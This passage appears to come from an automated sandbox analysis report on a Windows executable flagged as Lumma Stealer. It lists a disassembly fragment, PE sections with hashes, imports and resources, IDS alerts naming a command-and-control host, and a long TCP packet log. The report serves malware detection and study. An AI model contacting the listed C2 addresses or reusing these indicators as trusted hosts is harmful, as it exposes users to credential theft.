                                                                                                                                            mov dword ptr [ebp-28h], eax
                                                                                                                                            mov dword ptr [ebp-14h], eax
                                                                                                                                            mov eax, 004A2BC0h
                                                                                                                                            call 00007F68EC64225Dh
                                                                                                                                            xor eax, eax
                                                                                                                                            push ebp
                                                                                                                                            push 004A85C2h
                                                                                                                                            push dword ptr fs:[eax]
                                                                                                                                            mov dword ptr fs:[eax], esp
                                                                                                                                            xor edx, edx
                                                                                                                                            push ebp
                                                                                                                                            push 004A857Eh
                                                                                                                                            push dword ptr fs:[edx]
                                                                                                                                            mov dword ptr fs:[edx], esp
                                                                                                                                            mov eax, dword ptr [004B0634h]
                                                                                                                                            call 00007F68EC6D6357h
                                                                                                                                            call 00007F68EC6D5EAEh
                                                                                                                                            lea edx, dword ptr [ebp-14h]
                                                                                                                                            xor eax, eax
                                                                                                                                            call 00007F68EC657888h
                                                                                                                                            mov edx, dword ptr [ebp-14h]
                                                                                                                                            mov eax, 004B3708h
                                                                                                                                            call 00007F68EC63CAE7h
                                                                                                                                            push 00000002h
                                                                                                                                            push 00000000h
                                                                                                                                            push 00000001h
                                                                                                                                            mov ecx, dword ptr [004B3708h]
                                                                                                                                            mov dl, 01h
                                                                                                                                            mov eax, dword ptr [00423698h]
                                                                                                                                            call 00007F68EC6588EFh
                                                                                                                                            mov dword ptr [004B370Ch], eax
                                                                                                                                            xor edx, edx
                                                                                                                                            push ebp
                                                                                                                                            push 004A852Ah
                                                                                                                                            push dword ptr fs:[edx]
                                                                                                                                            mov dword ptr fs:[edx], esp
                                                                                                                                            call 00007F68EC6D63DFh
                                                                                                                                            mov dword ptr [004B3714h], eax
                                                                                                                                            mov eax, dword ptr [004B3714h]
                                                                                                                                            cmp dword ptr [eax+0Ch], 01h
                                                                                                                                            jne 00007F68EC6DCC9Ah
                                                                                                                                            mov eax, dword ptr [004B3714h]
                                                                                                                                            mov edx, 00000028h
                                                                                                                                            call 00007F68EC6591E4h
                                                                                                                                            mov edx, dword ptr [004B3714h]

                                                                                                                                            Data Directories

                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0xb60000x9a.edata
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xb40000xf1c.idata
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xb90000x4600.rsrc
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x266b040x2908
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0xb80000x18.rdata
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0xb42e00x240.idata
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0xb50000x1a4.didata
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                            Sections

                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                            .text0x10000xa50e00xa5200d2d65fadb7b1be676e1248ab404382daFalse0.3560172809424678data6.368250598681687IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                            .itext0xa70000x16680x180073e002411a8e0d309143a3e055e89568False0.5411783854166666data5.950488815097041IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                            .data0xa90000x37a40x380043e7b93b56ed2b1f2c341832da76e1f0False0.3604213169642857data5.027871318308703IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                            .bss0xad0000x676c0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                            .idata0xb40000xf1c0x1000daddecfdccd86a491d85012d9e547c63False0.36474609375data4.791610915860562IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                            .didata0xb50000x1a40x200be0581a07bd7d21a29f93f8752d3e826False0.345703125data2.7458225536678693IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                            .edata0xb60000x9a0x20057cd71ca96fdc064696777e5b35cf0bbFalse0.2578125data1.881069204504408IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                            .tls0xb70000x180x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                            .rdata0xb80000x5d0x200967e84eb6ac477621cd1643650d7bc91False0.189453125data1.3697437648744617IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                            .rsrc0xb90000x46000x4600e44948ca7f32719d0bee1a8f4e2ac964False0.322265625data4.440918715056619IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                            Resources

                                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                            RT_ICON0xb94c80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192DutchNetherlands0.5675675675675675
                                                                                                                                            RT_ICON0xb95f00x568Device independent bitmap graphic, 16 x 32 x 8, image size 320DutchNetherlands0.4486994219653179
                                                                                                                                            RT_ICON0xb9b580x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640DutchNetherlands0.4637096774193548
                                                                                                                                            RT_ICON0xb9e400x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1152DutchNetherlands0.3935018050541516
                                                                                                                                            RT_STRING0xba6e80x360data0.34375
                                                                                                                                            RT_STRING0xbaa480x260data0.3256578947368421
                                                                                                                                            RT_STRING0xbaca80x45cdata0.4068100358422939
                                                                                                                                            RT_STRING0xbb1040x40cdata0.3754826254826255
                                                                                                                                            RT_STRING0xbb5100x2d4data0.39226519337016574
                                                                                                                                            RT_STRING0xbb7e40xb8data0.6467391304347826
                                                                                                                                            RT_STRING0xbb89c0x9cdata0.6410256410256411
                                                                                                                                            RT_STRING0xbb9380x374data0.4230769230769231
                                                                                                                                            RT_STRING0xbbcac0x398data0.3358695652173913
                                                                                                                                            RT_STRING0xbc0440x368data0.3795871559633027
                                                                                                                                            RT_STRING0xbc3ac0x2a4data0.4275147928994083
                                                                                                                                            RT_RCDATA0xbc6500x10data1.5
                                                                                                                                            RT_RCDATA0xbc6600x2c4data0.6384180790960452
                                                                                                                                            RT_RCDATA0xbc9240x2cdata1.2045454545454546
                                                                                                                                            RT_GROUP_ICON0xbc9500x3edataEnglishUnited States0.8387096774193549
                                                                                                                                            RT_VERSION0xbc9900x584dataEnglishUnited States0.278328611898017
                                                                                                                                            RT_MANIFEST0xbcf140x62cXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.4240506329113924

                                                                                                                                            Imports

                                                                                                                                            DLLImport
                                                                                                                                            kernel32.dllGetACP, GetExitCodeProcess, LocalFree, CloseHandle, SizeofResource, VirtualProtect, VirtualFree, GetFullPathNameW, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVersion, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetSystemInfo, GetCommandLineW, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
                                                                                                                                            comctl32.dllInitCommonControls
                                                                                                                                            version.dllGetFileVersionInfoSizeW, VerQueryValueW, GetFileVersionInfoW
                                                                                                                                            user32.dllCreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
                                                                                                                                            oleaut32.dllSysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
                                                                                                                                            netapi32.dllNetWkstaGetInfo, NetApiBufferFree
                                                                                                                                            advapi32.dllRegQueryValueExW, AdjustTokenPrivileges, LookupPrivilegeValueW, RegCloseKey, OpenProcessToken, RegOpenKeyExW

                                                                                                                                            Exports

                                                                                                                                            NameOrdinalAddress
                                                                                                                                            TMethodImplementationIntercept30x453abc
                                                                                                                                            __dbk_fcall_wrapper20x40d3dc
                                                                                                                                            dbkFCallWrapperAddr10x4b063c

                                                                                                                                            Possible Origin

                                                                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                                                                            DutchNetherlands
                                                                                                                                            EnglishUnited States

                                                                                                                                            Network Behavior

                                                                                                                                            Suricata IDS Alerts

                                                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                            2024-10-28T15:50:07.155702+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449743104.21.83.166443TCP
                                                                                                                                            2024-10-28T15:50:07.155702+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449743104.21.83.166443TCP
                                                                                                                                            2024-10-28T15:50:08.587832+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449744104.21.83.166443TCP
                                                                                                                                            2024-10-28T15:50:08.587832+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449744104.21.83.166443TCP
                                                                                                                                            2024-10-28T15:50:15.323831+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449748104.21.83.166443TCP
                                                                                                                                            2024-10-28T15:50:19.440889+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449750104.21.83.166443TCP

                                                                                                                                            Network Port Distribution

                                                                                                                                            TCP Packets

                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                            Oct 28, 2024 15:49:44.514921904 CET49733443192.168.2.4104.18.111.161
                                                                                                                                            Oct 28, 2024 15:49:44.514961958 CET44349733104.18.111.161192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:44.515203953 CET49733443192.168.2.4104.18.111.161
                                                                                                                                            Oct 28, 2024 15:49:44.521009922 CET49733443192.168.2.4104.18.111.161
                                                                                                                                            Oct 28, 2024 15:49:44.521020889 CET44349733104.18.111.161192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:45.151885986 CET44349733104.18.111.161192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:45.152067900 CET49733443192.168.2.4104.18.111.161
                                                                                                                                            Oct 28, 2024 15:49:45.157063007 CET49733443192.168.2.4104.18.111.161
                                                                                                                                            Oct 28, 2024 15:49:45.157069921 CET44349733104.18.111.161192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:45.157318115 CET44349733104.18.111.161192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:45.203499079 CET49733443192.168.2.4104.18.111.161
                                                                                                                                            Oct 28, 2024 15:49:45.210458994 CET49733443192.168.2.4104.18.111.161
                                                                                                                                            Oct 28, 2024 15:49:45.251357079 CET44349733104.18.111.161192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:45.454230070 CET44349733104.18.111.161192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:45.454391956 CET44349733104.18.111.161192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:45.454493999 CET49733443192.168.2.4104.18.111.161
                                                                                                                                            Oct 28, 2024 15:49:45.455504894 CET49733443192.168.2.4104.18.111.161
                                                                                                                                            Oct 28, 2024 15:49:45.455519915 CET44349733104.18.111.161192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:45.494225025 CET49734443192.168.2.4164.132.58.105
                                                                                                                                            Oct 28, 2024 15:49:45.494312048 CET44349734164.132.58.105192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:45.494405985 CET49734443192.168.2.4164.132.58.105
                                                                                                                                            Oct 28, 2024 15:49:45.495032072 CET49734443192.168.2.4164.132.58.105
                                                                                                                                            Oct 28, 2024 15:49:45.495069981 CET44349734164.132.58.105192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:46.352864027 CET44349734164.132.58.105192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:46.353003979 CET49734443192.168.2.4164.132.58.105
                                                                                                                                            Oct 28, 2024 15:49:46.355978966 CET49734443192.168.2.4164.132.58.105
                                                                                                                                            Oct 28, 2024 15:49:46.356009960 CET44349734164.132.58.105192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:46.356324911 CET44349734164.132.58.105192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:46.358572960 CET49734443192.168.2.4164.132.58.105
                                                                                                                                            Oct 28, 2024 15:49:46.403338909 CET44349734164.132.58.105192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:46.717386007 CET44349734164.132.58.105192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:46.717463970 CET44349734164.132.58.105192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:46.717549086 CET49734443192.168.2.4164.132.58.105
                                                                                                                                            Oct 28, 2024 15:49:46.731673956 CET49734443192.168.2.4164.132.58.105
                                                                                                                                            Oct 28, 2024 15:49:46.731723070 CET44349734164.132.58.105192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:46.731756926 CET49734443192.168.2.4164.132.58.105
                                                                                                                                            Oct 28, 2024 15:49:46.731775045 CET44349734164.132.58.105192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:47.079078913 CET49735443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:47.079160929 CET44349735135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:47.079250097 CET49735443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:47.080288887 CET49735443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:47.080327034 CET44349735135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:47.964086056 CET44349735135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:47.964179993 CET49735443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:47.972147942 CET49735443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:47.972186089 CET44349735135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:47.972527027 CET44349735135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:47.972611904 CET49735443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:47.973880053 CET49735443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:48.019337893 CET44349735135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:48.230735064 CET44349735135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:48.230811119 CET44349735135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:48.230817080 CET49735443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:48.230889082 CET49735443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:48.232258081 CET49735443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:48.232300043 CET44349735135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:48.232327938 CET49735443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:48.232407093 CET49735443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:48.245045900 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:48.245088100 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:48.245244026 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:48.245471954 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:48.245484114 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:49.136547089 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:49.136708021 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:49.140160084 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:49.140165091 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:49.140620947 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:49.140625000 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:49.397167921 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:49.397208929 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:49.397327900 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:49.397337914 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:49.398633003 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:49.522593021 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:49.522733927 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:49.529767990 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:49.529980898 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:49.530251980 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:49.530364990 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:49.641624928 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:49.641736031 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:49.653955936 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:49.654082060 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:49.659185886 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:49.659301043 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:49.660271883 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:49.660351038 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:49.661001921 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:49.661098003 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:49.661218882 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:49.661273956 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:49.662342072 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:49.662489891 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:49.756803989 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:49.756934881 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:49.785113096 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:49.785197973 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:49.785659075 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:49.785746098 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:49.786395073 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:49.786504984 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:49.790597916 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:49.790687084 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:49.791152954 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:49.791224003 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:49.792010069 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:49.792102098 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:49.792397976 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:49.792460918 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:49.793112993 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:49.793221951 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:49.793545008 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:49.793658018 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:49.794310093 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:49.794406891 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:49.795962095 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:49.796035051 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:49.796364069 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:49.796499968 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:49.805964947 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:49.806039095 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:49.874298096 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:49.874442101 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:49.917596102 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:49.917671919 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:49.917718887 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:49.917718887 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:49.917727947 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:49.917766094 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:49.917797089 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:49.917803049 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:49.917836905 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:49.917836905 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:49.917999983 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:49.918091059 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:49.918732882 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:49.918837070 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:49.919344902 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:49.919430971 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:49.923388958 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:49.923580885 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:49.923913956 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:49.924031973 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:49.924489975 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:49.924597025 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:49.924902916 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:49.925028086 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:49.925549030 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:49.925674915 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:49.926143885 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:49.926239967 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:49.926681995 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:49.926724911 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:49.926769018 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:49.926769018 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:49.926784992 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:49.926848888 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:49.927381039 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:49.927449942 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:49.927519083 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:49.927570105 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:49.928257942 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:49.928384066 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:49.928797007 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:49.928854942 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:49.929552078 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:49.929611921 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:49.929625034 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:49.929637909 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:49.929661036 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:49.929661036 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:49.929694891 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:49.930432081 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:49.930480957 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:49.930526972 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:49.930526972 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:49.930533886 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:49.930912971 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:49.931288004 CET44349736135.181.116.240192.168.2.4
                                                                                                                                            Oct 28, 2024 15:49:49.931363106 CET49736443192.168.2.4135.181.116.240
                                                                                                                                            Oct 28, 2024 15:49:49.931684971 CET44349736135.181.116.240192.168.2.4
